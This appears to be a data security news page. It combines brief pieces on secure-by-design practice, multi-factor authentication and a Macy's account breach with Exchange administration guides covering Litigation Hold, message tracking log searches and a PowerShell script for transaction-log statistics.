Data Security News

Why are you here?

This is your stop for data security news and trends.

Security by design, not by add-ons

Organizations now aim to be secure by design

For many years, organizations would build technology solutions and then ‘bolt on’ security mechanisms and protections as an afterthought. This would often lead to deployment delays and additional costs. Organizations then shifted towards ‘building in’ security at various stages along the way. The security team was engaged periodically during development, but cybersecurity was still ‘tagged on’ at the end.

This mindset is changing yet again. With business leaders now confident digital is here to stay, they’re also recognizing they must be secure by design.

What’s the organizational impact?

This change in mindset is happening at various levels throughout the organization.

Business leaders are recognizing that cybersecurity must be aligned to their overall business goals and, moreover, that they must be cybersecurity-conscious at every point in their digital transformation journey.

Cybersecurity is being built-in as technologies and applications are conceptualized, designed, adopted, and built. DevOps and security operations teams are beginning to work more closely – as a DevSecOps team – creating the tools that enable secure digital transformation.

Increasingly, cybersecurity is being seen as an enabler of the business and we expect to see closer collaboration between cybersecurity and all levels of the organization.


Contact us at IDSS to set up a call or to discuss this in detail. We are here to help you protect your company from data breaches.

Why use Multi-Factor Authentication

The vast majority of data breaches have occurred through compromised authentication.  Although having a strong password is an important part of security, this is only one step to securing your network and data.  That’s why multi-factor authentication is so important and why security experts today are strongly recommending it for critical business systems.


Multi-factor authentication (MFA) is a method of computer access control in which a user is granted access only after successfully presenting at least two separate pieces of evidence to an authentication mechanism – typically of the following categories:

    knowledge (something they know)
    possession (something they have)
    inherence (something they are)

A common example of this is having a password and a one-time token or PIN that is provided via software on your smart phone or via a text message.  Without having both pieces of information, a user would not be able to log in successfully.  Many organizations today offer MFA, including Google, PayPal and most financial institutions.  

We use MFA at Lanspeed and we strongly encourage our clients to look into this as well for their mission-critical applications that contain sensitive information.  This significantly reduces the risk of an unwanted party accessing your most important systems and adds a layer of security that is hard to breach.

In my experience, many businesses aren’t aware of the many ways in which they need to protect their network. Contact IDSS to ensure you are asking the most important questions you should be asking about your network to make sure your systems are properly maintained and protected.



Macy's breach exposed customer data

Some Macy's online customers became victims of data theft, including their credit card numbers, following a breach in the retailer's security.

The breach took place between April 26 and June 12, during which time an "unauthorized third party" managed to obtain usernames and passwords and then log onto Macy's and Bloomingdale's shoppers' online profiles, the company said in a letter sent July 2 to the New Hampshire Attorney General's Office and first reported by DataBreaches. Macy's owns Bloomingdale's.

The leaked info may include customers' names, addresses, phone numbers, email addresses, birthdays, and credit and debit card numbers with expiration dates. However, the company noted that neither Credit Verification Values (CVV) nor Social Security numbers are stored on its online customer profiles. Macy's said it reported the exposed card numbers to Visa, Mastercard, American Express and Discover.

Profiles with suspicious login activity were blocked until the customers changed their passwords, Macy's said.

"We have investigated the matter thoroughly, addressed the cause and, as a precaution, have implemented additional security measures," the company said in a statement. "Macy's, Inc. will provide consumer protection services at no cost to those customers. We have contacted potentially impacted customers with more information about these services."

The total number of accounts accessed wasn't released, but the letter noted that 753 New Hampshire residents were affected. Macy's attached to the letter a document dated June 27 that was apparently sent to affected customers.

Last month, Adidas' US site fell victim to a similar breach. Its initial investigation suggested that some people's contact information, usernames and encrypted passwords were stolen.




Litigation Hold - Email Inbox

In Exchange 2010 and Exchange Online, we introduced Litigation Hold to allow you to immutably preserve mailbox content to meet long term preservation and eDiscovery requirements. When a mailbox is placed on Litigation Hold, mailbox content is preserved indefinitely.

Placing a mailbox on Litigation Hold

You can place a mailbox on Litigation Hold by using the Exchange Administration Center (EAC) or the Shell (set the LitigationHoldEnabled parameter). In Exchange 2010, you can also use the Exchange Management Console (EMC) to do this.

Figure 1: Enabling Litigation Hold for a mailbox using the EAC in Exchange 2013 and Exchange Online

Figure 2: Adding a note and a URL to inform & educate users placed on Litigation Hold

Preserving items for a specified duration

To preserve items for a specified period, we added the LitigationHoldDuration parameter to Exchange Online. This helps you meet your compliance needs by preserving all items in a mailbox for the specified duration, calculated from the date the item was created (date received in case of inbound email). For example, if your organization needs to preserve all mailbox data for seven years, you can place all mailboxes on Litigation Hold and set the LitigationHoldDuration to 7 years (in days).

This functionality is also available in Exchange 2013, allowing you to preserve items for a specified duration in your on-premises organization – one example of how developments in Exchange Online benefit Exchange Server on-premises.

In-Place Hold in Exchange 2013 and Exchange Online

In Exchange 2013 and the new Exchange Online, we introduced In-Place Hold, which allows more flexibility in preserving your data. Hold functionality is integrated with In-Place eDiscovery to allow you to search and preserve using a single wizard or a single cmdlet (New-MailboxSearch). You can use the In-Place eDiscovery & Hold wizard or the cmdlet to search for and preserve items matching your query parameters, known as a query-based In-Place Hold, preserve items for a specified period, known as a time-based hold, and also preserve everything indefinitely, which emulates the old Litigation Hold feature. Check out In-Place eDiscovery and In-Place Hold in the New Exchange - Part I and Part II for more info.

Using Litigation Hold in Exchange 2013 and Exchange Online

If you tried placing a mailbox on Litigation Hold using the EAC or the Shell, both interfaces displayed an alert message with a recommendation to switch to the new In-Place Hold feature. This recommendation was also reflected in the product documentation.

Figure 3: Warning displayed when using Litigation Hold in the EAC in Exchange 2013

Litigation Hold isn't going away

Since the release of Exchange 2013 and the new Exchange Online, we've received a lot of questions and feedback from you about whether Litigation Hold will be removed. We want to clarify that we do not plan to remove Litigation Hold from Exchange Online or Exchange 2013. We've removed the alert from Exchange Online and in Exchange 2013 SP1. We've also removed the recommendation from Exchange Online and Exchange 2013 documentation.

Use the hold feature that best meets your needs

You can use either hold feature to preserve mailbox data in Exchange 2013 and Exchange Online, based on your preservation needs. Here are some scenarios to help you choose between the two holds.

For each thing you want to do, the entries below give the answer for Litigation Hold and for In-Place Hold.

  • Preserve all items in a mailbox
    Litigation Hold: Yes.
    In-Place Hold: Yes. To preserve all items, don't specify any query parameters.
  • Preserve all items in a mailbox for a specific duration
    Litigation Hold: Yes. Specify the LitigationHoldDuration parameter for the mailbox using the Shell.
    In-Place Hold: Create a time-based In-Place Hold. Specify the duration in the In-Place Hold settings in the EAC or with the ItemHoldDuration parameter from the Shell.
  • Preserve items matching query parameters
    Litigation Hold: No. Litigation Hold preserves all items.
    In-Place Hold: Create a query-based In-Place Hold. Specify query parameters such as start date, end date, sender, recipients and keywords.
  • Specify types of items to preserve (such as email, calendar, notes)
    Litigation Hold: No. Litigation Hold preserves all items.
    In-Place Hold: You can use the EAC or the MessageTypes parameter from the Shell.
  • Specify hold settings for members of a distribution group
    Litigation Hold: Yes. Use the Get-DistributionGroupMember cmdlet in the Shell to pipe distribution group members to the Set-Mailbox cmdlet. [1]
    In-Place Hold: Easily specify distribution groups in the In-Place eDiscovery and Hold wizard in the EAC or in the SourceMailboxes parameter in the Shell. [2]
  • Maximum users on hold
    Litigation Hold: No maximum. Litigation Hold is a mailbox parameter, so no maximum limits apply. You can use the Shell to quickly place all users in an organization on hold.
    In-Place Hold: You can specify a maximum of 10,000 users per In-Place Hold object. To place additional users on hold, you must create another hold.
  • Place multiple holds on a mailbox
    Litigation Hold: No.
    In-Place Hold: Yes. You can place a user on multiple In-Place Holds, for example when a user is subject to multiple investigations or legal cases.
  • Make mailboxes inactive to preserve data in Exchange Online
    Litigation Hold: Yes. [3]
    In-Place Hold: Yes.
  • Archive Lync conversations and meeting content to Exchange
    Litigation Hold: Yes.
    In-Place Hold: Yes.

[1] The distribution group is expanded when you run the command. Future changes to the group require running the command again.
[2] Distribution groups are expanded only when you create or refresh the In-Place Hold. Future changes to the group require refreshing the search object.
[3] Inactive mailboxes are an Exchange Online feature. The linked documentation is being updated to clarify that you can also use Litigation Hold to make a mailbox inactive.
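The distribution-group scenario from the list above, as an added example that is not code from the original article: it expands a group, places each member mailbox on Litigation Hold for seven years (LitigationHoldDuration is given in days), and reads the hold settings back for verification. It assumes an Exchange Management Shell or Exchange Online PowerShell session in which Get-DistributionGroupMember, Get-Mailbox and Set-Mailbox are available; the group name 'Finance Team' is a constructed placeholder.

```powershell
# Added example (not from the original article). Assumes an Exchange Management
# Shell / Exchange Online PowerShell session with the Exchange cmdlets loaded.
function Set-GroupLitigationHold {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory = $true)]
        [string]$GroupIdentity,

        # Retention period in years; converted to days below because
        # LitigationHoldDuration is expressed in days.
        [int]$Years = 7
    )

    # 7 years -> 2555 days. Leap days are ignored here; use 366-day years
    # if your retention policy requires a strict calendar span.
    $days = $Years * 365

    # Footnote [1] above: the group is expanded at the moment the command runs,
    # so this function has to be re-run whenever membership changes.
    # Groups can also contain contacts or nested groups, which have no mailbox,
    # so keep only recipient types that end in "Mailbox".
    $members = Get-DistributionGroupMember -Identity $GroupIdentity -ResultSize Unlimited |
        Where-Object { $_.RecipientTypeDetails -like '*Mailbox' }

    foreach ($m in $members) {
        # -WhatIf / -Confirm are honoured through ShouldProcess, so the change
        # can be previewed before any mailbox is modified.
        if ($PSCmdlet.ShouldProcess($m.PrimarySmtpAddress, "Enable Litigation Hold for $days days")) {
            Set-Mailbox -Identity $m.Identity -LitigationHoldEnabled $true -LitigationHoldDuration $days
        }
    }

    # Read the hold state back so the result can be verified and audited.
    foreach ($m in $members) {
        Get-Mailbox -Identity $m.Identity |
            Select-Object DisplayName, PrimarySmtpAddress, LitigationHoldEnabled, LitigationHoldDuration, LitigationHoldDate
    }
}

# Preview first, then apply ('Finance Team' is a constructed group name):
Set-GroupLitigationHold -GroupIdentity 'Finance Team' -Years 7 -WhatIf
# Set-GroupLitigationHold -GroupIdentity 'Finance Team' -Years 7
```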




Message Tracking Logs by Sender or Recipient Email

The Get-MessageTrackingLog cmdlet provides two parameters for specifying sender and recipient email addresses as search criteria.

  • -Sender – a single SMTP address for the sender of the email message
  • -Recipients – one or more SMTP addresses for the recipients of the email message

Both parameters are optional, so if they are omitted the search will return all senders, all recipients, or all of both.

To demonstrate the use of these parameters consider the following email message sent from Alan Reid to three recipients.

Searching Message Tracking Logs by Sender Email Address

Because I happen to have sent this test message within the last hour, it is not very difficult for me to search for it by combining the -Sender parameter with the -Start parameter to search within a time/date range.

[PS] C:\>Get-MessageTrackingLog -Sender -Start (Get-Date).AddHours(-1)

EventId  Source   Sender                            Recipients                        MessageSubject
-------  ------   ------                            ----------                        --------------
SUBMIT   STORE...   {}                                Payroll report for September
RECEIVE  SMTP   {David.Gower@exchangeserverpro... Payroll report for September
DELIVER  STORE...   {Alex.Heyne@exchangeserverpro.... Payroll report for September
DELIVER  STORE...   {David.Gower@exchangeserverpro... Payroll report for September

However, if I were searching over a broader time range I may see more results than I really want to see.

[PS] C:\>Get-MessageTrackingLog -Sender

EventId  Source   Sender                            Recipients                        MessageSubject
-------  ------   ------                            ----------                        --------------
SUBMIT   STORE...   {}                                Descry turmoil deviance
SUBMIT   STORE...   {}                                Impending abeyance recitals ba...
SUBMIT   STORE...   {}                                Egress
SUBMIT   STORE...   {}                                Presage visceral penurious
SUBMIT   STORE...   {}                                Stipple voluble blatant stymie
SUBMIT   STORE...   {}                                Inured
SUBMIT   STORE...   {}                                Heinous mercurial
SUBMIT   STORE...   {}                                Relapse smolder
SUBMIT   STORE...   {}                                Meeting minutes
SUBMIT   STORE...   {}                                Supine poignant
SUBMIT   STORE...   {}                                Indigence denigrate swerve vig...
SUBMIT   STORE...   {}                                Jocular
SUBMIT   STORE...   {}                                Oblivious apropos condone savant
SUBMIT   STORE...   {}                                Obdurate splice penitent
SUBMIT   STORE...   {}                                Extenuate aplomb obtain eulogy
SUBMIT   STORE...   {}                                Cursory cryptic rescind euphoria
SUBMIT   STORE...   {}                                Lucubrate ruffian
SUBMIT   STORE...   {}                                Indigence umbrage
SUBMIT   STORE...   {}                                Emaciate valiant tractable
SUBMIT   STORE...   {}                                Volatile fission cajole
SUBMIT   STORE...   {}                                Concord legacy chisel fagged
SUBMIT   STORE...   {}                                Egress reconcile contrite cred...
SUBMIT   STORE...   {}                                Abstruse salacious constrict
SUBMIT   STORE...   {}                                Unearth recreancy paucity
SUBMIT   STORE...   {}                                A meeting #1
SUBMIT   STORE...   {}                                A meeting #2
SUBMIT   STORE...   {}                                Assuage foppish
SUBMIT   STORE...   {}                                Clamor austere collusion
SUBMIT   STORE...   {}                                Waffle saturnine
...snip!



So in the case where I want to search a broader time window, but see fewer irrelevant results, I can combine the -Sender and -Recipients parameters in my search command.

Searching Message Tracking Logs by Recipient Email Address

It doesn't matter whether the recipient was in the To, CC, or BCC of the message, the search will return any match regardless. Here the “Payroll report for September” email shown above is found even though Alex Heyne was one of several recipients and was in the CC field.

[PS] C:\>Get-MessageTrackingLog -Sender -Recipients

EventId  Source   Sender                            Recipients                        MessageSubject
-------  ------   ------                            ----------                        --------------
RECEIVE  SMTP   {David.Gower@exchangeserverpro... Payroll report for September
DELIVER  STORE...   {Alex.Heyne@exchangeserverpro.... Payroll report for September

You can specify multiple recipient SMTP addresses simply by separating them with a comma. When you do this the condition is an “or” not an “and”. In other words, any messages with any one of the recipients will be returned in the results, they do not need to be messages sent to all the recipients.

Here both the payroll email sent to Alex and David, as well as another email sent only to David, are returned in the same results.

[PS] C:\>Get-MessageTrackingLog -Sender -Recipients,

EventId  Source   Sender                            Recipients                        MessageSubject
-------  ------   ------                            ----------                        --------------
RECEIVE  SMTP   {David.Gower@exchangeserverpro... Payroll report for September
DELIVER  STORE...   {Alex.Heyne@exchangeserverpro.... Payroll report for September
DELIVER  STORE...   {David.Gower@exchangeserverpro... Payroll report for September
RECEIVE  SMTP   {David.Gower@exchangeserverpro... Also how about lunch?
DELIVER  STORE...   {David.Gower@exchangeserverpro... Also how about lunch?


Searching Message Tracking Logs for Wildcard Values or Partial Matches

Unfortunately, wildcard searches are not allowed with the -Sender and -Recipients parameters.

For example, this will return no results.

[PS] C:\>Get-MessageTrackingLog -Recipients *

However, you can use wildcards if you pipe the output of Get-MessageTrackingLog into Where-Object instead.

In this situation it is wise to limit the search to a specific date range for better performance. Or, if you do need to search the entire set of log files, remember to use -ResultSize Unlimited.

[PS] C:\>Get-MessageTrackingLog -Start (Get-Date).AddHours(-1) | Where-Object {$_.recipients -like "*"}

EventId  Source   Sender                            Recipients                        MessageSubject
-------  ------   ------                            ----------                        --------------
RECEIVE  STORE...   {}     Email to the internet!
TRANSFER ROUTING   {}     Email to the internet!
SEND     SMTP   {}     Email to the internet!

You can see that the wildcard is used with the -like comparison operator, but another technique is to use the -match comparison operator which doesn't require the wildcard character.

[PS] C:\>Get-MessageTrackingLog -Start (Get-Date).AddHours(-1) | Where-Object {$_.recipients -match "gmail"}

EventId  Source   Sender                            Recipients                        MessageSubject
-------  ------   ------                            ----------                        --------------
RECEIVE  STORE...   {}     Email to the internet!
TRANSFER ROUTING   {}     Email to the internet!
SEND     SMTP   {}     Email to the internet!

The same use of Where-Object with -like or -match also applies to the sender email address.


As you can see the -Sender and -Recipients parameters give us some flexibility when searching message tracking logs. However in some cases we need to use the more powerful capabilities of Where-Object for wildcard and partial string matching.
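The two behaviours described above, the "or" semantics of several recipients and the wildcard/partial matching that only Where-Object provides, as one added example that is not code from the original article. It runs on constructed sample objects shaped like Get-MessageTrackingLog output (the example.com addresses and subjects are made up) so it works without an Exchange server; in production you would pipe the real cmdlet into it, bounded with -Start/-End or -ResultSize Unlimited as discussed above.

```powershell
# Added example (not from the original article). Reusable filter giving
# tracking-log entries the wildcard and partial matching that the cmdlet's
# own -Sender/-Recipients parameters lack.
function Select-TrackingEntry {
    param(
        [Parameter(ValueFromPipeline = $true)] $Entry,
        [string]$SenderLike = '*',           # wildcard pattern for the sender
        [string[]]$RecipientLike = @('*'),   # wildcard patterns; ANY match wins ("or")
        [string]$RecipientMatch = ''         # regex fragment, e.g. 'gmail'
    )
    process {
        # Recipients is an array. -like/-match on an array return the matching
        # elements, so a non-empty result means at least one recipient matched,
        # which is the same "or" semantics as a comma-separated -Recipients list.
        $recipHit = $false
        foreach ($p in $RecipientLike) {
            if ($Entry.Recipients -like $p) { $recipHit = $true; break }
        }
        if ($RecipientMatch -ne '' -and -not ($Entry.Recipients -match $RecipientMatch)) { return }
        if ($recipHit -and ($Entry.Sender -like $SenderLike)) { $Entry }
    }
}

# Constructed sample entries (fictitious addresses); Source values mirror the
# STOREDRIVER/SMTP sources seen in the real output above.
$log = @(
    [pscustomobject]@{ EventId = 'RECEIVE'; Source = 'SMTP';        Sender = 'alan.reid@example.com'; Recipients = @('david.gower@example.com', 'alex.heyne@example.com'); MessageSubject = 'Payroll report for September' }
    [pscustomobject]@{ EventId = 'DELIVER'; Source = 'STOREDRIVER'; Sender = 'alan.reid@example.com'; Recipients = @('david.gower@example.com');                          MessageSubject = 'Also how about lunch?' }
    [pscustomobject]@{ EventId = 'SEND';    Source = 'SMTP';        Sender = 'alan.reid@example.com'; Recipients = @('someone@gmail.com');                                MessageSubject = 'Email to the internet!' }
    [pscustomobject]@{ EventId = 'RECEIVE'; Source = 'SMTP';        Sender = 'helpdesk@example.com';  Recipients = @('alan.reid@example.com');                            MessageSubject = 'Ticket closed' }
)

# 1) Messages from Alan to Alex OR David: the comma-separated -Recipients case.
#    Alex is matched even though he is only one of several recipients.
$log | Select-TrackingEntry -SenderLike 'alan.reid@*' -RecipientLike 'alex.heyne@*', 'david.gower@*' |
    Format-Table EventId, Source, MessageSubject -AutoSize

# 2) Partial match on the recipient domain: the Where-Object -match "gmail" case.
$log | Select-TrackingEntry -RecipientMatch 'gmail' |
    Format-Table EventId, Source, MessageSubject -AutoSize

# 3) The same technique applied to the sender side, as the last sentence above notes.
$log | Select-TrackingEntry -SenderLike 'helpdesk@*' |
    Format-Table EventId, Source, MessageSubject -AutoSize
```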




Analyzing Exchange Transaction Log Generation Statistics


When designing a site resilient Exchange Server solution, one of the required planning tasks is to determine how many transaction logs are generated on an hourly basis. This helps figure out how much bandwidth will be required when replicating database copies between sites, and what the effects will be of adding additional database copies to the solution. If designing an Exchange solution using the Exchange Server Role Requirements Calculator, the percent of logs generated per hour is an optional input field.

Previously, the most common method of collecting this data involved taking captures of the files in each log directory on a scheduled basis (using dir, Get-ChildItem, or CollectLogs.vbs). Although the log number could be extracted by looking at the names of the log files, there was a lot of manual work involved in figuring out the highest log generation from each capture and getting rid of duplicate entries. Once cleaned up, the data still had to be analyzed manually using a spreadsheet or a calculator. Trying to gather data across multiple servers and databases further complicated matters.

To improve upon this situation, I decided to write an all-in-one script that could collect transaction log statistics, and analyze them after collection. The script is called GetTransactionLogStats.ps1. It has two modes: Gather and Analyze. Gather mode is designed to be run on an hourly basis, on the top of the hour. When run, it will take a single set of snapshots of the current log generation number for all configured databases. These snapshots will be sent, along with the time the snapshots were taken, to an output file, LogStats.csv. Each subsequent time the script is run in Gather mode, another set of snapshots will be appended to the file. Analyze mode is used to process the snapshots that were taken in Gather mode, and should be run after a sufficient amount of snapshots have been collected (at least 2 weeks of data is recommended). When run, it compares the log generation number in each snapshot to the previous snapshot to determine how many logs were created during that period.

Script Features

Less Data to Collect

Instead of looking at the files within log directories, the script uses Perfmon to get the current log file generation number for a specific database or storage group. This number, along with the time it was obtained, is the only information kept in the output log file, LogStats.csv. The performance counters that are used are as follows:

Exchange 2013/2016

MSExchangeIS HA Active Database\Current Log Generation Number

Exchange 2010

MSExchange Database ==> Instances\Log File Current Generation

Note: The counter used for Exchange 2013/2016 contains the active databases on that server, as well as any now passive databases that had been activated on that server at some point since the last reboot. The counter used for Exchange 2010 contains all databases on that server, including all passive copies. To only get data from active databases, make sure to manually specify the databases for that server in the TargetServers.txt file. Alternately you can use the DontAnalyzeInactiveDatabases parameter when performing the analysis to exclude databases that did not increment their log count.

Multi Server/Database Support

The script takes a simple input file, TargetServers.txt, where each line in the file specifies the server, or server and databases to process. If you want to get statistics for all databases on a server, only the server name is necessary. If you want to only get a subset of databases on a server (for instance if you wanted to omit secondary copies on an Exchange 2010 server), then you can specify the server name, followed by each database you want to process.

Built In Analysis Capability

The script has the ability to analyze the output log file, LogStats.csv, that was created when run in Gather mode. It does a number of common calculations for you, but also leaves the original data in case any other calculations need to be done. Output from running in Analyze mode is sent to multiple .CSV files, where one file is created for each database, and one more file is created containing the average statistics for all analyzed databases. The following columns are added to the CSV files:

  • Hour: The hour that log stats are being gathered for. Can be between 0 – 23.
  • TotalLogsCreated: The total number of logs created during that hour for all days present in LogStats.csv.
  • TotalSampleIntervalSeconds: The total number of seconds between each valid pair of samples for that hour. Because the script gathers Perfmon data over the network, the sample interval may not always be exactly one hour.
  • NumberOfSamples: The number of times that the log generation was sampled for the given hour.
  • AverageSample: The average number of logs generated for that hour, regardless of sample interval size. Formula: TotalLogsCreated / NumberOfSamples.
  • PercentDailyUsage: The percent of all logs that that particular hour accounts for. Formula: LogsCreatedForHour / LogsCreatedForAllHours * 100.
  • PercentDailyUsageForCalc: The ratio of all logs for this hour compared to all logs for all hours. Formula: LogsCreatedForHour / LogsCreatedForAllHours.
  • AverageSamplePer60Minutes: Similar to AverageSample, but adjusts the value as if each sample had been taken exactly 60 minutes apart. Formula: TotalLogsCreated / TotalSampleIntervalSeconds * 3600.

Database Heat Map

As of version 2.0, this script also generates a database heat map when run in Analyze mode. The heat map shows how many logs were generated for each database during the duration of the collection. This information can be used to figure out whether databases, servers, or entire Database Availability Groups are over- or underutilized compared to their peers.

The database heat map consists of two files:

HeatMap-AllCopies.csv: A heat map of all tracked databases, including databases that may have failed over during the collection duration, and were tracked on multiple servers. This heat map shows the server specific instance of each database. Example:


HeatMap-DBsCombined.csv: A heat map containing only a single instance of each unique database. In cases where multiple copies of the same database had generated logs, the log count from each will be combined into a single value. Example:



The script has the following requirements:

  • Target Exchange Servers must be running Exchange 2010, 2013, or 2016
  • PowerShell Remoting must be enabled on the target Exchange Servers, and configured to allow connections from the machine where the script is being executed.


The script has the following parameters:

  • -Gather: Switch specifying we want to capture current log generations. If this switch is omitted, the -Analyze switch must be used.
  • -Analyze: Switch specifying we want to analyze already captured data. If this switch is omitted, the -Gather switch must be used.
  • -ResetStats: Switch indicating that the output file, LogStats.csv, should be cleared and reset. Only works if combined with -Gather.
  • -WorkingDirectory: The directory containing TargetServers.txt and LogStats.csv. If omitted, the working directory will be the current working directory of PowerShell (not necessarily the directory the script is in).
  • -LogDirectoryOut: The directory to send the output log files from running in Analyze mode to. If omitted, logs will be sent to WorkingDirectory.
  • -MaxSampleIntervalVariance: The maximum number of minutes that the duration between two samples can vary from 60. If we are past this amount, the sample will be discarded. Defaults to a value of 10.
  • -MaxMinutesPastTheHour: How many minutes past the top of the hour a sample can be taken. Samples past this amount will be discarded. Defaults to a value of 15.
  • -MonitoringExchange2013: Whether there are Exchange 2013/2016 servers configured in TargetServers.txt. Defaults to $true. If there are no 2013/2016 servers being monitored, set this to $false to increase performance.
  • -DontAnalyzeInactiveDatabases: When running in Analyze mode, this specifies that any databases that have been found that did not generate any logs during the collection duration will be excluded from the analysis. This is useful in excluding passive databases from the analysis.
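The Analyze-mode calculations listed under "Built In Analysis Capability", together with the two discard rules that -MaxSampleIntervalVariance and -MaxMinutesPastTheHour control, as an added example that is not part of GetTransactionLogStats.ps1 itself. The column names Timestamp, Database and LogGeneration, and the attribution of logs to the hour in which the earlier snapshot was taken, are assumptions; the real LogStats.csv layout is not shown on this page.

```powershell
# Added example, not part of GetTransactionLogStats.ps1. Assumed columns:
# Timestamp, Database, LogGeneration (the real LogStats.csv layout is not shown here).
function Get-HourlyLogStats {
    param(
        [Parameter(Mandatory = $true)] [object[]]$Samples,  # snapshots for ONE database
        [int]$MaxSampleIntervalVariance = 10,   # allowed deviation from 60 minutes
        [int]$MaxMinutesPastTheHour = 15        # allowed lateness after the top of the hour
    )

    $ordered = @($Samples | Sort-Object { [datetime]$_.Timestamp })

    # One accumulator per hour of the day (0-23).
    $hours = @{}
    foreach ($k in 0..23) {
        $hours[$k] = @{ TotalLogsCreated = [int64]0; TotalSampleIntervalSeconds = 0; NumberOfSamples = 0 }
    }

    for ($i = 1; $i -lt $ordered.Count; $i++) {
        $prev = [datetime]$ordered[$i - 1].Timestamp
        $curr = [datetime]$ordered[$i].Timestamp
        $intervalMin = ($curr - $prev).TotalMinutes

        # Rule 1 (-MaxSampleIntervalVariance): the gap must be 60 minutes +/- the variance.
        if ([math]::Abs($intervalMin - 60) -gt $MaxSampleIntervalVariance) { continue }
        # Rule 2 (-MaxMinutesPastTheHour): both snapshots must sit close to the top of the hour.
        if ($prev.Minute -gt $MaxMinutesPastTheHour -or $curr.Minute -gt $MaxMinutesPastTheHour) { continue }

        # Generation numbers only grow; a decrease means a reseed or restore, so skip it.
        $created = [int64]$ordered[$i].LogGeneration - [int64]$ordered[$i - 1].LogGeneration
        if ($created -lt 0) { continue }

        # Assumption: logs created between the 09:00 and 10:00 snapshots count for hour 9.
        $h = $hours[$prev.Hour]
        $h.TotalLogsCreated += $created
        $h.TotalSampleIntervalSeconds += [int]($curr - $prev).TotalSeconds
        $h.NumberOfSamples += 1
    }

    # LogsCreatedForAllHours in the formulas above.
    [int64]$allHours = 0
    foreach ($k in 0..23) { $allHours += $hours[$k].TotalLogsCreated }

    foreach ($k in 0..23) {
        $h = $hours[$k]
        $n = $h.NumberOfSamples
        $secs = $h.TotalSampleIntervalSeconds
        $avg = 0;   if ($n -gt 0)        { $avg = $h.TotalLogsCreated / $n }
        $pct = 0;   if ($allHours -gt 0) { $pct = $h.TotalLogsCreated / $allHours * 100 }
        $ratio = 0; if ($allHours -gt 0) { $ratio = $h.TotalLogsCreated / $allHours }
        $per60 = 0; if ($secs -gt 0)     { $per60 = $h.TotalLogsCreated / $secs * 3600 }
        [pscustomobject]@{
            Hour                       = $k
            TotalLogsCreated           = $h.TotalLogsCreated
            TotalSampleIntervalSeconds = $secs
            NumberOfSamples            = $n
            AverageSample              = $avg    # TotalLogsCreated / NumberOfSamples
            PercentDailyUsage          = $pct    # LogsCreatedForHour / LogsCreatedForAllHours * 100
            PercentDailyUsageForCalc   = $ratio  # LogsCreatedForHour / LogsCreatedForAllHours
            AverageSamplePer60Minutes  = $per60  # TotalLogsCreated / TotalSampleIntervalSeconds * 3600
        }
    }
}

# Constructed snapshots for one database: two mornings of hourly samples plus one
# off-schedule sample (10:40) that both discard rules reject. The 09:01 sample is
# late by one minute, which is within the defaults and therefore kept.
$rows = @(
    [pscustomobject]@{ Timestamp = '2016-03-01 08:00'; Database = 'DB01'; LogGeneration = 1000 }
    [pscustomobject]@{ Timestamp = '2016-03-01 09:01'; Database = 'DB01'; LogGeneration = 1120 }
    [pscustomobject]@{ Timestamp = '2016-03-01 10:00'; Database = 'DB01'; LogGeneration = 1300 }
    [pscustomobject]@{ Timestamp = '2016-03-01 10:40'; Database = 'DB01'; LogGeneration = 1350 }
    [pscustomobject]@{ Timestamp = '2016-03-02 08:00'; Database = 'DB01'; LogGeneration = 3000 }
    [pscustomobject]@{ Timestamp = '2016-03-02 09:00'; Database = 'DB01'; LogGeneration = 3100 }
)

Get-HourlyLogStats -Samples $rows | Where-Object { $_.NumberOfSamples -gt 0 } | Format-Table -AutoSize
```

To analyze a real collection, import LogStats.csv with Import-Csv, group the rows by database, and pass each group to Get-HourlyLogStats.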


Runs the script in Gather mode, taking a single snapshot of the current log generation of all configured databases:

PS C:\> .\GetTransactionLogStats.ps1 -Gather

Runs the script in Gather mode, and indicates that no Exchange 2013/2016 servers are configured in TargetServers.txt:

PS C:\> .\GetTransactionLogStats.ps1 -Gather -MonitoringExchange2013 $false

Runs the script in Gather mode, and changes the directory where TargetServers.txt is located, and where LogStats.csv will be written to:

PS C:\> .\GetTransactionLogStats.ps1 -Gather -WorkingDirectory "C:\GetTransactionLogStats" -ResetStats

Runs the script in Analyze mode:

PS C:\> .\GetTransactionLogStats.ps1 -Analyze

Runs the script in Analyze mode, and excludes database copies that did not generate any logs during the collection duration:

PS C:\> .\GetTransactionLogStats.ps1 -Analyze -DontAnalyzeInactiveDatabases $true

Runs the script in Analyze mode, sending the output files for the analysis to a different directory. Specifies that only sample durations between 55-65 minutes are valid, and that each sample can be taken a maximum of 10 minutes past the hour before being discarded:

PS C:\> .\GetTransactionLogStats.ps1 -Analyze -LogDirectoryOut "C:\GetTransactionLogStats\LogsOut" -MaxSampleIntervalVariance 5 -MaxMinutesPastTheHour 10

Example TargetServers.txt

The following example shows what the TargetServers.txt input file should look like. For the server1 and server3 lines, no databases are specified, which means that all databases on the server will be sampled. For the server2 and server4 lines, we will only sample the specified databases on those servers. Note that no quotes are necessary for databases with spaces in their names.


Output File After Running in Gather Mode

When run in Gather mode, the log generation snapshots that are taken are sent to LogStats.csv. The following shows what this file looks like:


Output File After Running in Analyze Mode

The following shows the analysis for a single database after running the script in Analyze mode:


Running As a Scheduled Task

Since the script is designed to be run on an hourly basis, the easiest way to accomplish that is to run the script via a Scheduled Task. The way I like to do that is to create a batch file which calls Powershell.exe and launches the script, and then create a Scheduled Task which runs the batch file. The following is an example of the command that should go in the batch file:

powershell.exe -noninteractive -noprofile -command "& {C:\LogStats\GetTransactionLogStats.ps1 -Gather -WorkingDirectory C:\LogStats}"

In this example, the script, as well as TargetServers.txt, are located in C:\LogStats. Note that I specified a WorkingDirectory of C:\LogStats so that if the Scheduled Task runs in an alternate location (by default C:\Windows\System32), the script knows where to find TargetServers.txt and where to write LogStats.csv. Also note that the command does not load any Exchange snapin, as the script doesn’t use any Exchange specific commands.


The following information only applies to versions of this script older than 2.0:

  • By default, the Windows Firewall on an Exchange 2013 server running on Windows Server 2012 does not allow remote Perfmon access. I suspect this is also the case with Exchange 2013 running on Windows Server 2008 R2, but haven’t tested. If either of the below errors is logged, you may need to open the Windows Firewall on these servers to allow access from the computer running the script.

ERROR: Failed to read perfmon counter from server SERVERNAME

ERROR: Failed to get perfmon counters from server SERVERNAME


After noticing that multiple people were having issues getting this to work through the Windows Firewall, I tried enabling different combinations of built in firewall rules until I could figure out which ones were required. I only tested on an Exchange 2013 server running on Windows Server 2012, but this should apply to other Windows versions as well. The rules I had to enable were:

File and Printer Sharing (NB-Datagram-In)

File and Printer Sharing (NB-Name-In)

File and Printer Sharing (NB-Session-In)

